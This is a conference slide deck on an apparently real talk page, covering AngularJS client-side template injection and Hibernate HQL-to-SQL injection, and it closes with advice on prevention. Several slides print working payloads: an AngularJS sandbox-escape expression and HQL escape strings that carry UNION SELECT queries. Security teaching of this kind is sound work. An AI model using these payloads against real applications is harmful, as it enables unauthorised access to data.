Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Advanced XSS and Injection Attacks

Casey Dunham
May 21, 2016
Programming
1
1k

Advanced XSS and Injection Attacks

Presentation on XSS in AngularJS and Hibernate SQL Injection given at Security BSides Boston 2016.

Links to the demo application:

https://github.com/caseydunham/angularjs-sandbox
https://github.com/caseydunham/hibernate-sandbox

Casey Dunham

May 21, 2016
Tweet

More Decks by Casey Dunham

See All by Casey Dunham
Hibernate Blind SQLi MISC 2016
caseydunham
0
480
Using OSINT to Attack Web Applications
caseydunham
2
190

Other Decks in Programming

See All in Programming
Gradle Convention Plugins
jmatsu
1
480
テスト自動化ツールを比較してみた 導入後の課題と相性の良いテスト
tapompom
2
440
Maintaining E2E Test Automation as We Transition from View to Compose
tkhs0604
0
510
A Practitioner's Journey from Ruby 1.8 to Present
koic
1
700
Astro 3.0入門
nozaki
0
190
Static Hermes (React Native EU 2023 Announcement)
tmikov2023
0
2.9k
GDSC NYCU 2023 茶會
rabbitmagician1
1
250
Compose Multiplatform 101
dalinaum
2
340
外部APIとズブズブな開発どうしてますか?
kin29
1
310
Build Backwards-Compatible REST APIs with Rolling Versions
subomi
0
130
タイミーiOSアプリへの Swift Concurrency 導入までの軌跡
_tanako
4
680
Jetpack Compose の Side-effect を使いこなす / DroidKaigi 2023
star_zero
1
680

Featured

See All Featured
Docker and Python
trallard
31
2.3k
Writing Fast Ruby
sferik
615
59k
Three Pipe Problems
jasonvnalue
89
9.2k
Intergalactic Javascript Robots from Outer Space
tanoku
263
26k
Large-scale JavaScript Application Architecture
addyosmani
501
110k
Support Driven Design
roundedbygravity
91
9.2k
Code Reviewing Like a Champion
maltzj
510
38k
5 minutes of I Can Smell Your CMS
philhawksworth
199
19k
Teambox: Starting and Learning
jrom
125
8.1k
Code Review Best Practice
trishagee
53
13k
The Cost Of JavaScript in 2023
addyosmani
8
1.5k
Fireside Chat
paigeccino
18
2.2k

Transcript

  1. Advanced XSS and
    Injection Attacks

    View Slide

  2. Agenda
    • Introduction
    • AngularJS Expressions
    • AngularJS XSS
    • HQL SQLi
    • Prevention
    • Q + A

    View Slide

  3. Introduction
    • Casey Dunham
    • Security Consultant for GuidePoint Security
    • Application Security
    • Code Reviews
    • Assessments
    • OWASP Maine
    • DC207
    • TOOOL
    @CaseyDunham
    @GuidePointSec

    View Slide

  4. AngularJS Expressions

    View Slide

  5. View Slide





  6. {{ product.name }}
    {{ product.price | currency }}
    Add to Cart




    ...


    View Slide





  7. {{ product.name }}
    {{ product.price | currency }}
    Add to Cart




    ...


    View Slide





  8. {{ product.name }}
    {{ product.price | currency }}
    Add to Cart




    ...


    View Slide





  9. {{ product.name }}
    {{ product.price | currency }}
    Add to Cart




    ...


    View Slide





  10. {{ product.name }}
    {{ product.price | currency }}
    Add to Cart




    ...


    View Slide





  11. {{ product.name }}
    {{ product.price | currency }}
    Add to Cart




    ...


    View Slide

  12. •Evaluated against a scope object
    •Evaluation is forgiving to undefined and null
    •Filters can be used to format data before displaying it
    •No Control Flow Statements
    •No Function Declarations
    •No RegExp Creation With Literal Notation
    •No Object Creation With New Operator
    •No Bitwise, Comma, And Void Operators
    Versus JavaScript Expressions

    View Slide

  13. AngularJS XSS

    View Slide

  14. • Gareth Heyes (PortSwigger)
    • XSS without HTML: Client-Side Template Injection
    with AngularJS
    • http://blog.portswigger.net/2016/01/xss-without-
    html-client-side-template.html
    Prior Research

    View Slide

  15. {{
    'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘);
    }}
    Sandbox Escape

    View Slide

  16. {{
    'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘);
    }}

    View Slide

  17. {{
    'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘);
    }}

    View Slide

  18. {{
    'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘);
    }}

    View Slide

  19. {{
    'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘);
    }}

    View Slide

  20. DEMO

    View Slide

  21. Hibernate Overview

    View Slide

  22. • Mikhail Egorov / Sergey Soldatov
    • ORM2Pwn: Exploiting Injections in hibernate ORM
    • Zeronights 0x05
    • New Methods for Exploiting ORM Injections in Java
    Applications
    • HITB 2016 (Later this May)
    Prior Research

    View Slide

  23. • Renaud Dubourguais
    • HQL : Hyperinsane Query Language
    • Safety Symposium on Information and
    Communication Technologies (SSTIC) 2015

    View Slide

  24. “Hibernate ORM (Hibernate in short) is an object-relational mapping
    framework for the Java language. It provides a framework for mapping
    an object-oriented domain model to a relational database.”
    - Wikipedia

    View Slide

  25. “Hibernate's primary feature is mapping from Java classes to database
    tables; and mapping from Java data types to SQL data types.”
    - Wikipedia

    View Slide

  26. View Slide

  27. public class Customer {
    private Long id;
    private String name;
    private String accountId;
    public Long getId() {
    return id;
    }
    public void setId(Long id) {
    this.id = id;
    }

    }
    id name account_id
    1 acme acme_123
    2 abc abc_789
    3 xyz xyz_3843

    View Slide

  28. String sql = "SELECT id, name, account_id
    FROM Customers WHERE account_id = ?”;
    PreparedStatement stmt = conn.prepareStatement(sql);
    stmt.setString(1, “acme_123”);
    ResultSet rs = stmt.executeQuery();
    Customer c = new Customer();
    if (rs.next()) {
    long id = rs.getLong("id");
    c.setId(id);
    String name = rs.getString("name");
    c.setName(name);
    String accountId = rs.getString("account_id");
    c.setAccountId(accountId);
    }

    View Slide

  29. String sql = "SELECT id, name, account_id
    FROM Customers WHERE account_id = ?”;
    PreparedStatement stmt = conn.prepareStatement(sql);
    stmt.setString(1, “acme_123”);
    ResultSet rs = stmt.executeQuery();
    Customer c = new Customer();
    if (rs.next()) {
    long id = rs.getLong("id");
    c.setId(id);
    String name = rs.getString("name");
    c.setName(name);
    String accountId = rs.getString("account_id");
    c.setAccountId(accountId);
    }

    View Slide

  30. String sql = "SELECT id, name, account_id
    FROM Customers WHERE account_id = ?”;
    PreparedStatement stmt = conn.prepareStatement(sql);
    stmt.setString(1, “acme_123”);
    ResultSet rs = stmt.executeQuery();
    Customer c = new Customer();
    if (rs.next()) {
    long id = rs.getLong("id");
    c.setId(id);
    String name = rs.getString("name");
    c.setName(name);
    String accountId = rs.getString("account_id");
    c.setAccountId(accountId);
    }

    View Slide

  31. String sql = "SELECT id, name, account_id
    FROM Customers WHERE account_id = ?”;
    PreparedStatement stmt = conn.prepareStatement(sql);
    stmt.setString(1, “acme_123”);
    ResultSet rs = stmt.executeQuery();
    Customer c = new Customer();
    if (rs.next()) {
    long id = rs.getLong("id");
    c.setId(id);
    String name = rs.getString("name");
    c.setName(name);
    String accountId = rs.getString("account_id");
    c.setAccountId(accountId);
    }

    View Slide

  32. String sql = "SELECT id, name, account_id
    FROM Customers WHERE account_id = ?”;
    PreparedStatement stmt = conn.prepareStatement(sql);
    stmt.setString(1, “acme_123”);
    ResultSet rs = stmt.executeQuery();
    Customer c = new Customer();
    if (rs.next()) {
    long id = rs.getLong("id");
    c.setId(id);
    String name = rs.getString("name");
    c.setName(name);
    String accountId = rs.getString("account_id");
    c.setAccountId(accountId);
    }

    View Slide

  33. String accountId = request.getParameter(“accountId”);
    String hql = "from Customer c where c.accountId = :accountId”;
    Query query = session.createQuery(hql);
    query.setString("accountId", accountId);
    Customer c = (Customer) query.uniqueResult();

    View Slide

  34. String accountId = request.getParameter(“accountId”);
    String hql = "from Customer c where c.accountId = :accountId”;
    Query query = session.createQuery(hql);
    query.setString("accountId", accountId);
    Customer c = (Customer) query.uniqueResult();

    View Slide

  35. String accountId = request.getParameter(“accountId”);
    String hql = "from Customer c where c.accountId = :accountId”;
    Query query = session.createQuery(hql);
    query.setString("accountId", accountId);
    Customer c = (Customer) query.uniqueResult();

    View Slide

  36. String accountId = request.getParameter(“accountId”);
    String hql = "from Customer c where c.accountId = :accountId”;
    Query query = session.createQuery(hql);
    query.setString("accountId", accountId);
    Customer c = (Customer) query.uniqueResult();

    View Slide

  37. String accountId = request.getParameter(“accountId”);
    String hql = "from Customer c where c.accountId = :accountId”;
    Query query = session.createQuery(hql);
    query.setString("accountId", accountId);
    Customer c = (Customer) query.uniqueResult();

    View Slide

  38. @Entity
    @Table(name=“customer”)
    public class Customer {
    @Id
    @GeneratedValue(
    strategy=GenerationType.IDENTITY
    )
    private Long id;
    @Column(
    name=“name”,
    nullable=false
    )
    private String name;
    @Column(
    name=“account_id”,
    nullable=false
    )
    private String accountId;

    }
    id name account_id
    1 acme acme_123
    2 abc abc_789
    3 xyz xyz_3843

    View Slide

  39. Exploiting HQL Queries

    View Slide

  40. • Similar to SQL
    • Fully Object Oriented
    • Uses mapped objects and their properties
    • More limited than SQL
    Hibernate Query Language

    View Slide

  41. from Customer c where c.accountId = ‘acme_123’
    Mapped Object
    Object Property
    Object Alias

    View Slide

  42. Can Still Be Vulnerable To Injection
    public List findAllCustomersLike(String query) {
    Session session = getSession();
    String hql = "from Customer c
    where c.name like '%" + query + “%'";
    Query q = session.createQuery(hql);
    return (List) q.list();
    }

    View Slide

  43. Can Still Be Vulnerable To Injection
    public List findAllCustomersLike(String query) {
    Session session = getSession();
    String hql = "from Customer c
    where c.name like '%" + query + “%'";
    Query q = session.createQuery(hql);
    return (List) q.list();
    }

    View Slide

  44. View Slide

  45. View Slide

  46. Let’s Fix Our Injection
    String hql = "from Customer c
    where c.name
    like '%" + query + “%'";

    View Slide

  47. Let’s Fix Our Injection
    String query = "' or 1=1 or ''='";
    String hql = "from Customer c
    where c.name
    like '%" + query + “%'";

    View Slide

  48. Let’s Fix Our Injection
    String hql = "from Customer c
    where c.name
    like '%" + "' or 1=1 or ''='" + "%'";

    View Slide

  49. Success!

    View Slide

  50. • Enumerate other columns (properties)?
    • Access other mapped objects?
    So Now What?

    View Slide

  51. Screw that and let’s just get
    to the fun stuff.

    View Slide

  52. Blind SQLi

    View Slide

  53. HQL Injection SQL Injection

    View Slide

  54. Escaping HQL
    • In HQL the \ is a valid character
    • In HQL to escape a ' we use ‘'
    • Can combine these to pass along our SQL Injection
    through HQL

    View Slide

  55. View Slide

  56. Success!
    • We can now continue along with a normal SQL Injection
    • But…
    • SQL needs to be Valid
    • HQL needs to be Valid as well

    View Slide

  57. Here’s where it gets tricky

    View Slide

  58. String hql = "from Customer c
    where c.name like '%" + query + "%'";
    Injection Here

    View Slide

  59. http://localhost/search?q=test

    View Slide

  60. q=test' and 1='1

    View Slide

  61. View Slide

  62. q=test' and '1\''=1 -- '='1

    View Slide

  63. q=test' and '1\''=1 union select 1,database(),3-- '='1

    View Slide

  64. View Slide

  65. q=test' and '1\''=1 union select 1,database(),version()— '='1

    View Slide

  66. w00t!

    View Slide

  67. select
    customer0_.id as id1_0_,
    customer0_.account_id as account_2_0_,
    customer0_.name as name3_0_
    from
    customers customer0_
    where
    (
    customer0_.name like '%test'
    )
    and '1\''=1 union select 1,database(),version()— '='1%'

    View Slide

  68. Prevention

    View Slide

  69. Prevention is the same as all SQL Injection

    View Slide

  70. Don’t use String Concatenation To Build Queries!!

    View Slide

  71. String accountId = request.getParameter(“accountId”);
    String hql = "from Customer c where c.accountId = :accountId”;
    Query query = session.createQuery(hql);
    query.setString("accountId", accountId);
    Customer c = (Customer) query.uniqueResult();

    View Slide

  72. • Look for calls to
    • createQuery
    • createSQLQuery
    • All take HQL strings that could have potential for
    Injection.

    View Slide

  73. Q + A

    View Slide

  74. Thank You!

    View Slide

  75. @CaseyDunham

    View Slide